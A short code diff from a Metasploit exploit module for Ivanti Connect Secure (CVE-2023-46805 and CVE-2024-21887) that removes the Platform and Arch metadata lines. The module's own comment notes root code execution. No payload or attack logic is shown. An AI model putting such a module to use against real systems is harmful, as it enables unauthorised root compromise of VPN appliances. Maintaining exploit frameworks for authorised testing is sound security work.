@@ -32,8 +32,6 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://labs.watchtowr.com/welcome-to-2024-the-sslvpn-chaos-continues-ivanti-cve-2023-46805-cve-2024-21887/']
         ],
         'DisclosureDate' => '2024-01-10',
-        'Platform' => %w[linux unix],
-        'Arch' => [ARCH_CMD],
         'Privileged' => true, # Code execution as root.
         'Targets' => [
           [
